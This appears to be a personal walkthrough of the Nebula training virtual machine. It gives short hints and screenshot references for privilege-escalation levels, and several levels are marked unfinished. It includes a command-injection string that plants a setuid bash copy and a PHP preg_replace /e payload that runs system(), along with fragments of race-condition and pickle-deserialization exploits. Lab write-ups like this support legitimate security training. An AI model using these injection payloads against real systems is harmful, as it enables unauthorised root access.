Exploit-Exercises: Nebula (v5) Walkthrough
reference | Exploit-Exercises: Nebula (v5), Exploit Education > Nebula |
target ip | 192.168.1.32 |
Level 00
suid:
data:image/s3,"s3://crabby-images/55baa/55baabe1c0dabfa7bfc79cb47682bdcc92627d2c" alt="level00_suid"
Level 01
Hijack echo
:
data:image/s3,"s3://crabby-images/f0e63/f0e6332f15215f7623d39a2558d57e04167bed96" alt="level01_echo"
Level 02
Environment variable USER
:
data:image/s3,"s3://crabby-images/ed1a2/ed1a277ef35abfc52e219d09e5564f72e5ed0f8a" alt="level02_user"
Level 03
Add a script /home/flag03/writable.d/test.sh
:
data:image/s3,"s3://crabby-images/80c1b/80c1bc33625ba0f66d2d7ce90cd7416ed14cda2f" alt="level03_test"
Wait for cron:
data:image/s3,"s3://crabby-images/14376/14376ff278aa8ad528d29115aef77aca89d02fa7" alt="level03_cron"
You cannot use /tmp
, because of nosuid
:
data:image/s3,"s3://crabby-images/afc73/afc73369910086b2c348c8b2cae621875bdf48de" alt="level03_fstab"
Level 04
Try to rename the original file:
data:image/s3,"s3://crabby-images/e3b35/e3b3502c5958c82d64b301f96efb2a5f64507828" alt="level04_ln"
Level 05
/home/flag05/.backup/backup-19072011.tgz
:
data:image/s3,"s3://crabby-images/c6f54/c6f54412b2b730bee855ee2c5bd26e7fb8181b35" alt="level05_tar"
Login as user flag05:
data:image/s3,"s3://crabby-images/1a8ab/1a8abe2c11bb0fd4617440459a48b41bc24c4023" alt="level05_ssh"
Level 06
/etc/passwd
:
data:image/s3,"s3://crabby-images/b462c/b462c7a531fb00c9073bbcbad481910e49fbc860" alt="level06_passwd"
Level 07
Code injection:
1 | 127.0.0.1;cp /bin/bash /home/flag07/bash;chmod u+s /home/flag07/bash;echo 1 |
data:image/s3,"s3://crabby-images/4f444/4f4443c77d510e0eb09112eddb0ff50835f455ff" alt="level07_curl"
Level 08
/home/flag08/capture.pcap
:
data:image/s3,"s3://crabby-images/6e171/6e171933a77c1d78d42ca9fd7d14dac35ea1a07a" alt="level08_wireshark"
0x7f.
Level 09
1 | $contents = preg_replace("/(\[email (.*)\])/e", "spam(\"\\2\")", $contents); |
1 | $contents = preg_replace("/(\[email (.*)\])/e", "spam(\"${${system($use_me)}}\")", $contents); |
data:image/s3,"s3://crabby-images/fe888/fe88806d8aae9c4cf8e36a6b8eada38aee7134ac" alt="level09_php"
Level 10
Make the program access()
the file which is owned by user level10, but open()
the file which is owned by user flag10:
1 | while [[ 1 -eq 1 ]]; do |
data:image/s3,"s3://crabby-images/7d1ef/7d1ef7ad954daddc738b80f493cadef83358f471" alt="level10_nc"
Level 11
TBD
Level 12
TBD
Level 13
LD_PRELOAD
to replace the original getuid
.
But LD_PRELOAD
cannot be used with suid program.
data:image/s3,"s3://crabby-images/04499/0449989c0d43a4eedfbb4c4f753fe21bdb69c023" alt="level13_ld_preload"
Level 14
1 | import sys |
data:image/s3,"s3://crabby-images/fdf2c/fdf2c8b18be5088dfa65c3627fceb59ce3094b66" alt="level14_decrypt"
Level 15
TBD
Level 16
Minimal vulnerable code:
data:image/s3,"s3://crabby-images/2386c/2386c7c941ec7cc51a3b8e4350d3ea01add047b2" alt="level16_inject"
/tmp/FLAG16.SH
:
1 |
|
data:image/s3,"s3://crabby-images/e141a/e141afb669f2302199e1492e502dbec85e96081d" alt="level16_bash"
Level 17
pickle
1 | import cPickle |
data:image/s3,"s3://crabby-images/cbb6c/cbb6c5e6212ab8d81fe299488870deae674a5b33" alt="level17"
Level 18
TBD
Level 19
TBD
I’ll try to complete this post when I’m not so busy..